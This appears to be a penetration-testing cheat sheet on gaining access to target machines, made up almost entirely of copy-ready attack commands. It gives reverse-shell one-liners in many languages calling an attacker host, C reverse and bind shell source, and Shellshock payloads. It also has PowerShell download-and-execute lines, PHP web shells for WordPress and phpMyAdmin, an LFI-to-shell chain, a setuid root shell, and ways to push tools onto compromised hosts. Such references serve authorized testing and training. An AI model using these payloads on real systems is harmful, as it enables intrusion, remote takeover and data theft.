Gaining access
Shell it?

Shells

Reverse shells

Bash

Bash and TCP sockets
1
bash -i >& /dev/tcp/x.x.x.x/6969 0>&1
2
/bin/bash -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1
Copied!
sh and TCP sockets
1
/bin/sh -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1
Copied!

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",6969));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Copied!

Perl

1
perl -e 'use Socket;$i="x.x.x.x";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Copied!

Perl Windows

1
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:6969");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Copied!

PHP

1
php -r '$sock=fsockopen("x.x.x.x",6969);exec("/bin/sh -i <&3 >&3 2>&3");'
Copied!

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",6969).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Copied!

Netcat

1
nc -e /bin/sh x.x.x.x 6969
2
nc -e cmd.exe x.x.x.x 6969
3
/bin/sh | nc x.x.x.x 6969
4
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 6969 0/tmp/p
Copied!

Telnet

1
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 6969 0/tmp/p
2
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443
Copied!

Java

1
r = Runtime.getRuntime()
2
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/6969;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
3
p.waitFor()
Copied!

Shellshock reverse shell

Verify vuln within http user-agent header:
1
() { :; }; /bin/bash -c 'whoami'
Copied!
Spawn reverse shell:
1
() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/6969 0>&1;'
Copied!

PowerShell

Invoke-PowerShellTcp

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Add to bottom:
1
Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 6969
Copied!
Then fire up webserver at Kali, setup nc listener at port 6969 and download at target:
1
# from cmd
2
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')
3
4
# PowerShell
5
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')
Copied!

C

1
// gcc reverse.c -o reverse
2
3
#include <stdio.h>
4
#include <unistd.h>
5
#include <sys/socket.h>
6
#include <arpa/inet.h>
7
8
int main (int argc, char **argv)
9
{
10
int scktd;
11
struct sockaddr_in client;
12
13
client.sin_family = AF_INET;
14
client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
15
client.sin_port = htons(6969); // attacker port
16
17
scktd = socket(AF_INET,SOCK_STREAM,0);
18
connect(scktd,(struct sockaddr *)&client,sizeof(client));
19
20
dup2(scktd,0); // STDIN
21
dup2(scktd,1); // STDOUT
22
dup2(scktd,2); // STDERR
23
24
execl("/bin/sh","sh","-i",NULL,NULL);
25
26
return 0;
27
}
Copied!

Bind shells

C

1
// gcc bind.c -o bind
2
3
#include <stdio.h>
4
#include <unistd.h>
5
#include <sys/socket.h>
6
#include <arpa/inet.h>
7
8
int main (int argc, char **argv)
9
{
10
int scktd = -1;
11
int scktd_client = -1;
12
int i = -1;
13
struct sockaddr_in server;
14
struct sockaddr_in client;
15
16
scktd = socket(AF_INET,SOCK_STREAM,0);
17
if (scktd == -1)
18
return -1;
19
20
server.sin_family = AF_INET;
21
server.sin_addr.s_addr = INADDR_ANY;
22
server.sin_port = htons(6969); // local listening port
23
24
if(bind(scktd,(struct sockaddr *)&server,sizeof(server)) < 0)
25
return -2;
26
27
listen(scktd,3);
28
i = sizeof(struct sockaddr_in);
29
scktd_client = accept(scktd,(struct sockaddr *)&client,(socklen_t*)&i);
30
if (scktd_client < 0)
31
return -3;
32
33
dup2(scktd_client,0); // STDIN
34
dup2(scktd_client,1); // STDOUT
35
dup2(scktd_client,2); // STDERR
36
37
execl("/bin/sh","sh","-i",NULL,NULL);
38
39
return 0;
40
}
Copied!

Web shells

PHP

Add to WordPress Theme 404 page and then http://x.x.x.x/404.php?cmd=id
Or spawn reverse shell http://x.x.x.x/404.php?cmd=nc x.x.x.x 6969 -e /bin/sh
1
<?php echo shell_exec($_GET['cmd']); ?>
2
<? passthru($_GET["cmd"]); ?>
3
<?php echo shell_exec($_GET["cmd"]); ?>
Copied!

phpMyAdmin

1
<?php system("/usr/local/bin/wget http://x.x.x.x:6969/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>
Copied!

Run SQL query

1
SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"
Copied!

From LFI to reverse shell

First verify LFI. Example with nullbyte:
1
http://x.x.x.x/blah?parameter=/etc/passwd%00
Copied!
Using Hackbar (Firefox extension).
POST request URL:
1
http://x.x.x.x/blah?parameter=php://input%00
Copied!
POST data:
1
<? phpinfo(); ?>
Copied!
POST data for reverse shell at port 443:
1
<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>
Copied!

HTTP methods

Try if you can upload a shell via an upload form.

HTTP POST

Where "x.x.x.x" is the target IP
1
curl -X POST -F "[email protected]/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"
Copied!

HTTP PUT

Where "x.x.x.x" is the attacker's IP
1
curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php
Copied!

Inject PHP -> JPEG

1
exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' hodor.jpeg
2
exiftool "-comment<=shell.php" hodor.png
Copied!

Local

C for SUID

Spawns a Linux shell:
1
int main(void){
2
setresuid(0, 0, 0);
3
system("/bin/bash");
4
}
Copied!

File transfers

First fire up our fileserver:
Python webserver (default port 8000)
1
python -m SimpleHTTPServer
Copied!
Python webserver at port 8001
1
python -m SimpleHTTPServer 8001
Copied!
Python webserver with upload form
1
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py
Copied!

Windows

PowerShell

Any version
1
(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:6969/file", "C:\Users\hodor\file")
2
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')
Copied!

Download via RCE

1
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1
2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1
Copied!

FTP

Option 1

Configure FTP at Kali:
1
#!/bin/bash
2
groupadd ftpgroup
3
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
4
pure-pw useradd hodor -u ftpuser -d /ftphome
5
pure-pw mkdb
6
cd /etc/pure-ftpd/auth/
7
ln -s ../conf/PureDB 60pdb
8
mkdir -p /ftphome
9
chown -R ftpuser:ftpgroup /ftphome/
10
/etc/init.d/pure-ftpd restart
Copied!
Start FTP server at Kali:
1
# FTP home dir = /ftphome/
2
/etc/init.d/pure-ftpd start
Copied!
Download nc.exe at target:
1
echo open x.x.x.x 21> test.txt
2
echo USER hodor>> test.txt
3
echo hodor>> test.txt
4
echo bin >> test.txt
5
echo GET nc.exe >> test.txt
6
echo bye >> test.txt
7
ftp -v -n -s:test.txt
Copied!

Option 2

Configure FTP at Kali:
1
apt-get install python-pyftpdlib
Copied!
Start FTP server at Kali:
1
python -m pyftpdlib -p 21
Copied!
Download files (in this example at a Windows target):
1
ftp x.x.x.x
2
get nc.exe
Copied!

Launch reverse shell

1
nc.exe -nv x.x.x.x 6969 -e cmd.exe
2
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 6969
Copied!

Share local folder with RDP

1
rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare
Copied!

VBScript

Below a VBScript / Linux wget alternative
1
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
2
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
3
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
4
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
5
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
6
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
7
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
8
echo Err.Clear >> wget.vbs
9
echo Set http = Nothing >> wget.vbs
10
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
11
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
12
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
13
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
14
echo http.Open "GET",strURL,False >> wget.vbs
15
echo http.Send >> wget.vbs
16
echo varByteArray = http.ResponseBody >> wget.vbs
17
echo Set http = Nothing >> wget.vbs
18
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
19
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
20
echo strData = "" >> wget.vbs
21
echo strBuffer = "" >> wget.vbs
22
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
23
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
24
echo Next >> wget.vbs
25
echo ts.Close >> wget.vbs
Copied!
Then execute the above script:
1
cscript wget.vbs http://x.x.x.x/file.exe file.exe
Copied!

Linux

Wget

1
wget http://x.x.x.x/blah.txt
2
wget http://x.x.x.x/blah.txt -O blah.txt
Copied!

Netcat

From attacher -> target
At target
1
nc -lvp 6969 > blah.txt
Copied!
At attacker (method 1)
1
nc x.x.x.x 6969 < blah.txt
Copied!
At attacker (method 2)
1
cat blah.txt | nc x.x.x.x 6969
Copied!

Python

1
python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py
Copied!
Last modified 2yr ago